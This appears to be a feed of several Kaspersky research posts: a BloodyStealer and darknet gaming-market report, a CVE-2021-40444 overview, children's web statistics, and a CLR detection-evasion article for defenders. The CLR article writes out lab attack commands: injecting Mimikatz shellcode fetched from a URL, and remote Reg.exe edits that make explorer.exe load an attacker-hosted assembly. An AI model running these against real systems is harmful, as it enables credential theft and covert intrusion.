Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 1 óra 14 perc
2021. szeptember 27.

BloodyStealer and gaming assets for sale

Earlier this year, we covered the threats related to gaming, and looked at the changes from 2020 and the first half of 2021 in mobile and PC games as well as various phishing schemes that capitalize on video games. Many of the threats faced by gamers are associated with loss of personal data, and particularly, accounts with various gaming services.

This tendency is not unique to PC or mobile games or to the gaming industry as a whole. Nevertheless, as games offer users plenty of in-game goodies and even feature their own currencies, gaming accounts are of particular interest to cybercriminals.

In this report, we take a closer look at threats linked to loss of accounts with popular video game digital distribution services, such as Steam and Origin. We also explore the kind of game-related data that ends up on the black market and the prices.


In March 2021, we noticed an advertisement for malware named “BloodyStealer” on a Russian-speaking underground forum. According to the ad, BloodyStealer was a malicious stealer capable of fetching session data and passwords, and cookie exfiltration, and protected against reverse engineering and malware analysis in general. A buyer can use Telegram channels as well as traditional web panels for communication with the C&C. The author offered potential customers to get in touch via Telegram. The price of BloodyStealer is 700 RUB (less than $10) for one month or 3000 RUB (approx. $40) for lifetime.

The BloodyStealer ad

The ad highlights the following features of BloodyStealer (translated from Russian as is):

  • Grabber for cookies, passwords, forms, bank cards from browsers
  • Stealer for all information about the PC and screenshots
  • Steals sessions from the following clients: Bethesda, Epic Games, GOG, Origin, Steam, Telegram, VimeWorld
  • Steals files from the desktop (.txt) and the uTorrent client
  • Collects logs from the memory
  • Duplicate logging protection
  • Reverse engineering protection
  • Not functional in the CIS

What caught our attention is BloodyStealer’s capability to fetch information related to computer games installed on an infected system. BloodyStealer targets major online gaming platforms, such as Steam, Epic Games Store, EA Origin, etc.

At the time of our investigation, the forum thread related to BloodyStealer was publicly unavailable, but the analysis of visible information on the forum revealed that discussions relating to BloodyStealer still continued in private channels. This, along with the fact that visible stealer activity had been observed since its release, suggested that the threat actor behind BloodyStealer had decided to offer its product only to VIP members of underground forums.

Kaspersky products detect the threat as Trojan-Spy.MSIL.Stealer.gen. For additional technical information about BloodyStealer (malicious techniques, YARA rules, etc.), please contact financialintel@kaspersky.com.

BloodyStealer technical details Anti-analysis

During our research, we were able to identify several anti-analysis methods that were used to complicate reverse engineering and analysis of BloodyStealer, including the usage of packers and anti-debugging techniques. As the stealer is sold on the underground market, every customer can protect their sample with a packer of their choice or include it into a multistage infection chain. We had been monitoring BloodyStealer since its announcement, so we were able to notice that the majority of the BloodyStealer samples were protected with a commercial solution named “AgileNet”.

While analyzing samples discovered in the wild, we found that some of them were protected not only with AgileNet but also with other, very popular, protection tools for the .NET environment, such as Confuser.

Victim identification, communication with the C&C and data exfiltration

BloodyStealer is capable of assigning a unique identifier to every infected victim. The identifier is created by extracting data, such as the GUID and serial number (SID) of the system. This information is extracted at runtime. Besides this identification, BloodyStealer extracts the public IP address of the C&C by requesting the information from the domain whatleaks[.]com.

The request used to get the public IP

After assigning a UID to the victim and getting the C&C IP address, BloodyStealer extracts various data from the infected machine, creates a POST request with information about the exfiltrated data, and sends it to the malicious C&C. The data itself is sent to the configured C&C server later as a non-protected ZIP archive and has the structure shown below.

The IP address configured in the infected system is used as the name of the ZIP archive.

BloodyStealer as part of a multistage infection chain

In our analysis of BloodyStealer samples, we found out how various threat actors who had acquired this product decided to use the stealer as a part of other malware execution chains, for example, KeyBase or Agent Tesla. The criminals who combined the stealer component with other malware families also protected BloodyStealer with other packers, such as Themida.

BloodyStealer as used alongside other malware families or hacking tools

Based on the price that BloodyStealer is fetching on the underground market, we can expect that it will be used in combination with other popular malware families.

Command and Control

As mentioned above, BloodyStealer sends all exfiltrated data to a C&C server. Cybercriminals can access the data by using Telegram or via a web panel. The collected data can then be sold to other cybercriminals, who in turn will try to monetize it.

BloodyStealer C&C login page

When a criminal is logged in to the C&C web panel, they will see a basic dashboard with victim-related statistics.

BloodyStealer stats dashboard

While pivoting through the structure used for allocating the content panel, we were able to identify the second C&C server located at


Both C&C servers are placed behind Cloudflare, which hides their original IPs and provides a layer of protection against DDoS and web attacks.


BloodyStealer is still quite new on the market when compared to other existent malware tools; however, by analyzing available telemetry data, we have found detections of BloodyStealer in Europe, Latin America and the APAC region. At the time of the investigation, we observed that BloodyStealer mostly affected home users.

Next links in the chain: darknet markets

Unfortunately, BloodyStealer is just one example of stealers targeting gamers. With many more in use, cybercriminals gather a significant number of game-related logs, login credentials, and other data, spurring a well-developed supply and demand chain for stolen credentials on the dark web. In this section, we will dig deeper into the dark gaming market and look at the types of game-related items available there.

Our experts, who specialize in understanding what goes on on the dark web, conducted research on the current state of user data as a commodity on these platforms to find out what kind of personal data is in demand, what it is used for, and how much it costs. For the purposes of this report, we analyzed active offers on twelve international darknet forums and marketplaces that use English or Russian.

Wholesale deals

Dark web sellers provide a broad variety of goods, sold both wholesale and retail. Specifically, one of the most popular wholesale products is logs.

In these examples, cybercriminals offer logs: an archive containing more than 65,000 logs for 150$ and packages with 1,000 private logs for 300$

Logs are credentials that are needed for accessing an account. These typically take the form of saved browser cookies, information about server logins, screenshots of the desktop, etc. They are the key for accessing victims’ accounts. Logs might be outdated, contain only old game sessions or even have no account-related data. That is why they need to be checked before use. In the chain of log sales, there are several roles.

Firstly, there are people who steal logs with the help of botnets or phishing schemes. These are the operators. The operators might have thousands of collected logs in their clouds, but this whole data stream needs to be validated. To process the logs, the cybercriminal needs to check whether the login and password combination is still relevant, how many days have passed since the last password or email change (that is, whether the victim has found out that the account was stolen) and check the balance. The fraudsters might do it on their own, but this may prove quite time-consuming with thousands of logs to go through. For this, there are log checkers: cybercriminals who own special tools for processing logs. The software collects statistics about processed logs, and the checker gets a share of the profits: typically, 40%.

It is possible to purchase logs per unit and process them manually or purchase in bulk and process with the help of specialized services. The average price per log is 34¢; the price per 100 logs is $17.83.

This advertiser is offering a batch of logs for $25,000 to one person but makes no mention of the volume of data

There are also fraudsters who have websites with a large coverage, offering to place links to malware as a way of distribution. In their ads on the darknet, these fraudsters attach traffic and download statistics to attract more customers.

Retail options

If the cybercriminal specializes in small sales (two to ten items), then the type of goods they offer on the darknet will include certain games, in-game items, and accounts with popular gaming platforms. Importantly, these products are typically offered at just 60-70% of their original price, so customers get a good deal on darknet markets. Some criminals can possess thousands of accounts and offer access to these at an enormous discount, as many of these accounts are useless: some cost nothing, and others have already been recovered by their original owners.

A person is offering thousands of usernames and passwords for various game platforms for just $4000

Dark web sellers offer stolen accounts, the important selection criteria being the number of games available in the account and how long ago the account was created. Games and add-ons are not cheap, and this is where cybercriminals enter the fray, offering the same popular games at significantly lower prices. In addition to Steam, accounts on gaming platforms, such as Origin, Ubisoft Store, GOG, Battle.net, also get stolen and resold.


A seller is offering in-game items. The original price is $20.5, but customers can get these illegally for $16.45.

In addition to certain games and accounts, cybercriminals also sell rare equipment from a wide range of games with a discount 30-40% off the original price. This is possible if the Steam account that owns the items has no restrictions on sending gifts to other players, e.g., no email confirmation requirement.

Some cybercriminals also sell so-called “Steam balance”. Depending on the origin, Steam balance can be “white” or “black”. White means sold from the seller’s own account. A player could get tired of the game and decide to sell their account, along with all associated in-game goodies, offering it on the black market, as Valve does not approve this kind of deals. Accounts like that can be used for illegal activity, such as fraud or money laundering as they do not ­– yet – look suspicious to Steam. Black balance means that the Steam accounts were obtained illegally, e.g., through phishing, social engineering or other cybercriminal techniques. Cybercriminals do their best to withdraw money by buying Steam cards, in-game items, gifts, etc., before the original owners retake control of their property with the help of the support service.

A person is outlining a scheme for stealing accounts with the help of PUBG phishing pages

Besides buying goods, darknet forum visitors can also purchase access to phishing instruments, which is a less popular offer. As you can see in the screenshot, the cybercriminal is offering a tool named “Black Mafia”. Phishing tools can even be downloaded from GitHub, after accepting the condition that these will be used for educational purposes only.

A criminal can use the tool for creating a phishing link and sending it to an unsuspecting victim. This generally follows the tried and tested flow: the victim clicks the link and inputs their credentials, which then end up in the hands of the fraudsters.


This overview demonstrates the structure of the game log and login stealing business. With the gaming industry growing, we do not expect this cybercriminal activity to wane in the future – on the opposite, this is the area in which we are likely to see more attacks as tools for targeting gamers continue to develop. BloodyStealer is a prime example of an advanced tool used by cybercriminals to penetrate the gaming market. With its efficient anti-detection techniques and attractive pricing, it is sure to be seen in combination with other malware families soon. Furthermore, with its interesting capabilities, such as extraction of browser passwords, cookies, and environment information as well as grabbing information related to online gaming platforms, BloodyStealer provides value in terms of data that can be stolen from gamers and later sold on the darknet. The overview of game-related goods sold on the darknet forums, too, confirms that this is a lucrative niche for cybercriminals. With online gaming platform accounts holding valuable in-game goods and currency, these become a juicy target. Although purchasing accounts is a gamble, as these may or may not contain goods that can be sold, cybercriminals are willing to take a bet – and are certain to find customers that are looking to save on entertainment.

To minimize the risks of losing your gaming account, follow these simple tips:

  • Wherever possible, protect your accounts with two-factor authentication. For others, comb through account settings.
  • A strong, reliable security solution will be a great help to you, especially if it will not slow down your computer while you are playing. At the same time, it will protect you from all possible cyberthreats. We recommend Kaspersky Total Security. It works smoothly with Steam and other gaming services.
  • It is safer to buy games on official sites only and wait for the sales – these take place fairly often and are typically tied to big holidays such as Halloween, Christmas, Saint Valentine’s Day, so you will not be sitting on your hands for long.
  • Try to avoid buying the first thing that pops up. Even during Steam’s summer sale, before forking out the dough for a little-known title, at least read some reviews of it. If something is fishy, people will probably have figured it out.
  • Beware of phishing campaigns and unfamiliar gamers contacting you. It is a good idea to double-check before clicking website links you receive via email and the extensions of files you are about to open.
  • Try not to click on any links to external sites from the game chat, and carefully check the address of any resource that requests you to enter your username and password: the page may be fake.
2021. szeptember 23.

Wake me up till SAS summit ends

What do cyberthreats, Kubernetes and donuts have in common – except that all three end in “ts”, that is? All these topics will be mentioned during the new SAS@Home online conference, scheduled for September 28th-29th, 2021. To be more specific, there will be a workshop titled, “Prevent & Detect Security Threats in the Kubernetes Era” and a presentation titled, “Time to Make the Donuts”, the latter presumably not about actual doughnuts. As for cyberthreats, this topic is always on the table because it is the phenomenon we confront every day and the cause that unites us researchers.

What else can we offer during the two eventful days?

  • Kaspersky experts Igor Kuznetsov and Georgy Kucherin will tell a story of how they investigated top-class commercial spyware and dissected an infamous toolset.
  • Rintaro Koike, Shogo Hayashi and Ryuichi Tanabe of NTT Security, Japan will present a research paper, titled, “Operation Software Concepts: A Beautiful Envelope for Wrapping Weapon”.
  • Ivan Kwiatkowski and Pierre Delcher of Kaspersky GReAT will describe possible links between the Tomiris malware and the supply-chain attacks on Solarwind.
  • PWC’s John Southworth will teach the audience to dance with APT41.
  • More details about the GhostEmperor APT, tools to catch zero-click zero-days, supply-chain attacks in Farsi and, of course, our usual workshops.

Last but not least, we are preparing worthy challenges for everyone interested in malware analysis and threat hunting. During SAS@Home, the 9th Edition of our, by now well-established, CTF/Hackgame, players will compete in five categories, trying to solve challenges presented by CTF hosts David Jacoby and Marco Preuss. This year, we will have the following categories: kNOW yOUR eNEMY, dEBUGGERS pARADISE, oLDsKOOL, cODEbREAKER and THE WiLD WEB, each with five amazing levels. You do not need to be a reversing wizard, guru programmer or ninja analyst – there is something for everyone to tackle and solve.

At the end, the top five players will win a seat at Kaspersky xTraining, worth $1,400! However, our game is not just about prizes, but having fun and learning something new. Always remember: you cannot loose anything, but you can win it all.

2021. szeptember 21.

Detection evasion in CLR and tips on how to detect such attacks

In terms of costs, the age-old battle that pits attacker versus defender has become very one sided in recent years. Almost all modern attacks (and ethical offensive exercises) use Mimikatz, SharpHound, SeatBelt, Rubeus, GhostPack and other toolsets available to the community. This so-called githubification is driving attackers’ costs down and reshaping the focus from malware development to the evasion of security mechanisms. What’s the point of creating a tool that can be detected by EPP solutions when you can gain more by simply reusing existing tools and learning how to perform attacks with them? It places the onus – and costs – on the defender who suddenly needs new expertise, tools and processes.

Fileless and malwareless attacks, heavy usage of the LOLBAS list, runtime encryption, downloaders, packers, as well as old, repurposed and completely new techniques to evade a variety of security tools and controls – all these are actively used by attackers. No one is surprised by Mimikatz being embedded in InstallUtil.exe. In our article we will describe an evasion technique that can be employed to hide offensive activities in the memory, namely, how to delete indicators from memory. We will then provide you with some tools and methods that may be useful for detecting this technique. We’ll review applications running in or using the CLR (Common Language Runtime) environment, such as PowerShell, numerous LOLBAS tools, and multiple C# utilities.

If you’re already familiar with CLR, you can go straight to Detection evasion in CLR.

CLR basics

When you compile a source code written in C# the compiler doesn’t give you a ready-to-run PE file, but an assembly. This is primarily a set of statements (CIL code) for the runtime environment to generate native code (which in its turn will be executed) during the execution of this assembly. The process of creating native code from the assembly at runtime is called JIT compilation.

Common Language Runtime. Source: https://ru.wikipedia.org/wiki/Common_Language_Runtime

The assembly resulting from the compilation of an application will contain the following data:

  • Metainformation on classes, interfaces, types, methods and fields in the assembly. These data are needed for CLR to handle the written code: load it, reference it, run one code from another, and pass input and output data. The process of reading and applying this data is called reflection.
  • The code itself, defined in modules. It just can’t be launched without being processed in CLR.
  • Assembly Manifest containing data on security, versions, dependencies and the assembly elements. The manifest defines what is needed to execute code. For instance, if your code needs https://github.com/JamesNK/Newtonsoft.Json to be launched, it will be defined in the manifest.
  • All types of files and data, which can be included in the assembly itself or stored as separate files.

Loading and execution of assemblies is a complicated process – let’s take a closer look at how it works.

Process startup

The ETW CLR Runtime Provider (GUID e13c0d23-ccbc-4e12-931b-d9cc2eee27e4) gives a good indication of a process startup with managed code.

Event EventID Quantity per process Description RuntimeInformationEvent 187 One CLR launched. AppDomainLoad_V1 156 Many AppDomain loaded. AssemblyLoad_V1 154 Many Assembly loaded. ModuleLoad_V2 152 Many Module loaded.
Our code is here ModuleUnload_V2 153 Many Module unloaded. AssemblyUnload_V1 155 Many Assembly unloaded. AppDomainUnLoad_V1 157 Many AppDomain unloaded. From an SOC analyst point of view, it’s interesting if this event happens at random intervals many times. CLR launch

Microsoft implemented CLR as a COM server inside DLL. It means that a standard COM interface is used for the CLR environment and a GUID is assigned to this interface and the COM server. When you install the .NET Framework the COM server representing the CLR is registered in the Windows Registry just like any other COM server. Any Windows application can host the CLR environment. This kind of hosting generates event 187 with information on CLR activation and includes COM activation data: StartupMode, ComObjectGUID fields containing useful information on how the CLR has been loaded, which is especially interesting in the case of COM activation.

Refer to the MetaHost.h C++ header file provided with the .NET Framework SDK if you need extra information on this topic. This header file specifies the GUID identifiers and the definition of the unmanaged ICLRMetaHostinterface. You will learn how to run the CLR with any language: C++, Python, etc.

Application domain load

Event 156 appears: loading of the application domain into the CLR. When the CLR COM server initializes, it creates an application domain. The AppDomain represents a logical container for a set of assemblies that typically implement an application. Also, the application domain is a mechanism implemented in the CLR that allows you to run a group of applications as a single process ensuring their relative isolation while allowing them to interact with each other much faster. There can be multiple application domains in a single process. The first application domain will be created when the CLR environment is initialized. It’s called the default application domain and is only destroyed when the Windows process terminates.

Objects created in one application domain cannot be directly accessed by code in another application domain. When an application domain code creates an object, the object “belongs” to that application domain. Also, an object (including an artifact) is not allowed to exist longer than the lifetime of the application domain whose code created it. A code in other application domains can only access an object in other application domains by marshalling (data transfer), by reference or by value. This ensures clear separation and boundaries, since a code in one application domain cannot have a direct reference to an object created by a code in other application domains. This isolation makes it easy to unload application domains from the process without affecting the code running in other application domains.

Note that this is precisely what allows application domains to be unloaded. The CLR does not support the ability to unload a single assembly from an AppDomain. However, you can command the CLR to unload the entire AppDomain, which will unload all the assemblies it currently contains.

Each application running in its own address space is a great feature. It ensures that code of one application cannot access code or data used by another. Process isolation prevents security breaches, data corruption and other unpredictable actions, making Windows and the applications running on it reliable. Unfortunately, creating processes in Windows is very “expensive”. The Win32 CreateProcess function is very slow, and Windows requires a significant amount of memory to virtualize the process address space.

However, if the application consists entirely of managed code that is reliably secure and does not invoke unmanaged code, there’s no problem with running multiple managed applications in the same Windows process. Application domains provide the isolation necessary to protect, configure and terminate each of these applications. The unit of isolation for code in the CLR is the application domain, not the process. We can say, with a few assumptions, that the process starting in WinAPI semantics is equivalent to the application domain creation. For an SOC analyst, it would be better to view the application domain load and process start events as being functionally the same.

There is no hard-coded limit on the number of application domains that can run in a single Windows process. Just like with IIS server sites, each site is a separate application domain with its own isolation and can be unloaded from the server without affecting the other sites.

Assembly load

Next, the assembly needs to be loaded into the application domain or a shared domain if the assembly is going to be shared between application domains. Such assemblies are called domain-neutral and we won’t address them in this article. The assembly determines a set of rules for the code it contains, providing the CLR (and other code) with information about the types and classes defined in the assembly.

Module load

Modules with CIL code are loaded into the assembly. The CIL code goes to JIT compilation to produce executable native code in accordance with the manifest. Note that we need to unload the entire application domain in order to remove the artifact that is defined (or appears in the described process) in the module.

The figure shows a single Windows process running a single CLR COM server. This CLR environment currently manages two AppDomains. Both AppDomains have their own loader heap, each of which maintains a record of what types have been available since the AppDomain creation. Each loader heap has a method table and each entry in the method table points to JIT-compiled native code if the method has been executed at least once.

CLR via C# J. Rihter

Detection evasion in CLR

First, let’s look at when and how the attack will be detected. For this purpose, we will analyze an attack using the Covenant framework.

Running Covenant in a single application domain

Let’s look at how the Covenant framework works. By firing up the Grunt agent and executing typical offensive activities, we can collect information on the current user, AutoStart and AutoRun entries, Kerberos tickets loaded into the current user’s session, as well as the browser history. As a result, we can see several assemblies loaded into our application domain: Seatbelt AutoRuns, Seatbelt ChromeHistory, Rubeus klist and others.

Loaded assemblies of Rubeus and Seatbelt

A set of assemblies with different functions are loaded into the same application domain and in one process. Such assemblies can be easily detected by classic security tools with signature analysis (a lot of indicators present in the code and the execution results). It’s also impossible to unload them because they are linked with the same application domain as the code that implements interaction with the C2.

Process start and injection

How do attackers try to stay undetected? They may use the classic means of code splitting: code injection and/or starting a new process for their malicious purposes. However, that’s not always possible: in fact, there are situations where both an injection and starting a new process will be too conspicuous for security monitoring tools. Also, it’s not always possible to close a process that contains an indicator, for example, if the attacker has used a system process. To illustrate this, we can create the Mimikatz shellcode (Donut) and inject it into a process (I chose PowerShell) using Process Injection, which was started from Covenant’s Grunt. It’s the same method described in the lab here. In addition, we can see both the start of the injector process and the injection. We can monitor these activities using Sysmon with “default” config by SwiftOnSecurity.

Uploading injector application

Starting injector and injecting shellcode

Grunt on the victim’s host executed ProcessInjection.exe with the command line below (b64 encoded shellcode in glist):

ProcessInjection.exe /t:1 /f:base64 /pid:1604 /url:https://gist.githubusercontent.com/gam4er/07aae8b5284c9aa54ff976c3f4bc0cd9/raw/ec0de97792230bbb0526dd60659c3e1c75c 3a63b/Mimi

And Sysmon shows lots of suspicious activities as shown below.

Create executable file Create process Inject code from ProcessInjection.exe to powershell.exe

With AV/EPP/EDR the execution chain cannot be completed because it is a well-known attacker activity pattern. The conclusion is that the old methods of running/spawning/injecting code are very noticeable.

COM-based CLR agent

Now I would like to describe a way that will cause a remote machine to download and run code through the activation of a COM server in the Explorer process.

Let’s register our COM server as MSCOREE library (implements CLR functionality in Windows) with the inputs: name of assembly and class with server implementation. As a result, we instructed the CLR to load the code implementing the server from the specified class in the event of activation.

Note the CodeBase key. It allows us to use the COM server without registering our assembly in the Global Assembly Cache and to define the COM server on behalf of the user (GAC registration requires administrative privileges). This parameter takes a URI and is a little unusual. The host process downloads the assembly containing the COM server from the network and launches it. COM server registration is also possible via the network: we just need to change the system registry to define it.

There are multiple CLR configuration methods as well as parameters: configuration files and global environmental variables. Moreover, there is a special parameter that allows or forbids (forbids by default) assemblies loading from remote sources. However, CLR activation using a COM server in the Explorer host process is allowed by default (assemblies can be downloaded from remote sources). It’s not a vulnerability, but a feature.

Demo attack: Complicating things for detection

We mentioned that a single application domain (Running Covenant in a single application domain) and project creation/injection (Process start and injection) can be detected can be detected with varying degrees of difficulty, but are primarily high-profile, visible activities. We also showed how to set up remote code loading to CLR. Now let’s look at how detection tasks can be complicated on a demo with a COM-based CLR agent. We will be running vanilla Mimikatz in the context of the Explorer process on the remote host and clearing up artefacts after Mimikatz execution. This demo attack is conducted on a host we already have access to. Every step is available in the following video with transcript below. The transcript also contains timestamps in case you want to start watching from a particular step.

We have Yara scanner and Yara rules from Mimikatz repo as our EPP of choice to scan memory. Inveigh and Mimikatz are already installed on the victim’s host. First, let’s check that the Yara rule is a match.

Now let’s look at the explorer.exe process (PID 3896) and confirm that there are no signs of Mimikatz inside. Next, we restart explorer.exe to show one more time that’s its clean and doesn’t contain any CLR assemblies.

Next, we move to the attacker’s host (01:40). An Explorer handler is added to the registry of the victim’s host. When the victim starts explorer.exe, an assembly from the remote (attacker) host will be loaded for execution.

Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}" /ve /t REG_SZ /d "ReadOnlyFileIconOverlayHandler" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /ve /t REG_SZ /d "mscoree.dll" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "Assembly" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler, Version=, Culture=neutral, PublicKeyToken=1aadad2b22ca8c0e" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "Class" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "RuntimeVersion" /t REG_SZ /d "v4.0.30319" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "CodeBase" /t REG_SZ /d "http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "Assembly" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler, Version=, Culture=neutral, PublicKeyToken=1aadad2b22ca8c0e" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "Class" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "RuntimeVersion" /t REG_SZ /d "v4.0.30319" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "CodeBase" /t REG_SZ /d "http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /ve /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler\CLSID" /ve /t REG_SZ /d "{A259C04F-FFA8-310B-864C-FE602840399E}" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ ReadOnlyFileIconOverlayHandler" /ve /t REG_SZ /d "{a259c04f-ffa8-310b-864c-fe602840399e}" /f Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved" /v "{a259c04f-ffa8-310b-864c-fe602840399e}" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler" /f

Returning to the victim’s host (02:30), we emulate the user logon by restarting explorer.exe.

Now explorer.exe has .NET assemblies loaded and there are still no suspicious artifacts inside the process. There will be none until KatzAssembly is loaded and executed. Spot the empty (for now) application domain spawned inside our target process.

At 03:50 we execute Mimikatz, which creates detectable assemblies in the memory.

Right after the Mimikatz operation is finished, we unload (04:18) the application domain spawned for this Mimikatz session. And the Yara scan shows that there are no longer any artifacts.

This practical example can be summarized in the mini diagram below. The idea is, unfortunately, rather easy to implement and very expensive to detect (performance for memory scans, scanning of unloading applications, etc.), but luckily vary rarely seen in the wild.

Detection of CLR memory clearing

How do you detect CLR memory clearing? You need to keep an eye on how often application domains are unloaded.

The figure shows the sequence of ETW events: application domain creation, assembly loading, and assembly and application domain unloading. You can log this using different tools, for example, SilkETW.

SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2008 -ot file -p Loader.json

You can aggregate the events of application domain load and unload, and identify the process that most often loads and unloads application domains.

The AMSI interface scans assemblies during loading, but it would also be useful to scan assembly memory and resources during unloading, though obviously not for prevention purposes. Of course, this additional scanning would also have a negative impact on performance.

Detection of COM activation of the CLR environment and remote assembly load

The trick with downloading remote code through the COM server activating in the Explorer process can be detected if you monitor activation parameters (startupMode and COMObjectGUID) in event 187.

Additionally, registration events (in the system registry) for any new COM servers with the [HKEY_CLASSES_ROOT\CLSID\{GUID}\InprocServer32\CodeBase] value containing a URL address should be monitored as well as the loading of assemblies by the Explorer process from %AppData%\Local\assembly\dl3\([0-9A-Z]{8}.[0-9A-Z]{3}\\\){2}.*\Assemb.dll.

Useful links
2021. szeptember 16.

Exploitation of the CVE-2021-40444 vulnerability in MSHTML


Last week, Microsoft reported the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine. According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. In attempt to exploit this vulnerability, attackers create a document with a specially-crafted object. If a user opens the document, MS Office will download and execute a malicious script.
According to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit the CVE-2021-40444 vulnerability targeting companies in the research and development sector, the energy sector and large industrial sectors, banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the few published Proof-of-Concept (PoC), we expect to see an increase in attacks using this vulnerability.

Geography of CVE-2021-40444 exploitation attempts

Kaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:

  • HEUR:Exploit.MSOffice.CVE-2021-40444.a
  • HEUR:Trojan.MSOffice.Agent.gen
  • PDM:Exploit.Win32.Generic

Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept

Experts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using Behavior Detection and Exploit Prevention components. Within our Managed Detection and Response service, our SOC experts are able to detect when this vulnerability is expoited, investigate such attacks and notify customers.

Technical details

The remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine which is a component of modern Windows systems, both user and server. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint).
In order to exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing an URL for a malicious script. If a victim opens the document, Microsoft Office will download the malicious script from the URL and run it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim’s computer. For example, the original zero-day exploit which was used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, which are delivered by exploiting the CVE-2021-40444 vulnerability.

Mitigations IoC



2021. szeptember 16.

Summer 2021: Friday Night Funkin’, Måneskin and pop it

This summer, several events that were postponed from 2020 due to the pandemic took place. Some of them interested children, while others barely registered by them. It is worth noting that children’s hobbies typically do not change from winter to summer — the only difference is that they devote more time to them during the summer vacation. In line with their typical habits, in summer 2021 children spent time watching their favorite YouTube bloggers, playing games, watching cartoons and listening to music. All that changed was the specific things they watched and played. In this article we will tell you more about what was popular with children this summer.

How we collect our statistics Website categorization

Kaspersky Safe Kids included into our home solutions scans the contents of web pages that children try to visit. If the site falls into one of 14 undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all the 14 categories.
  • The information in this report was obtained from computers running Windows and macOS.

Web filtering in Kaspersky Safe Kids currently covers the following categories:

Search query filtering

Looking at children’s search activity is the best way to see what they are interested in. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

This report presents statistics on YouTube searches. The TOP 1000 search queries collected from YouTube over the period from June to August 2021, inclusive, was taken as 100%. The ranking was based on the number of times a query was input, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.

We divided the search queries we collected from June through August 2021 into several subject categories:

  • Educational content
  • Toys
  • Sports
  • TikTok
  • Memes
  • Hobbies and creation
  • Trends (popular challenges, etc.)
  • Gacha Life
  • Movies, cartoons and TV shows
  • Music
  • YouTube bloggers
  • Computer games
  • Miscellaneous
Control the use of programs

Kaspersky Safe Kids allows parents to control and limit the amount of time their children spend on apps and programs on their devices. This study draws on anonymized data on the number of hours children in the world spent on apps on Android devices.

We determined TOP 10 apps in the world. We took the sum of the hours spent on these apps for 100%. The percentage breakdown in the TOP 10 reflects the number of hours spent on each app.

Kids’ interests overview

Kaspersky Safe Kids alerts distribution by category, June through August 2021 (download)

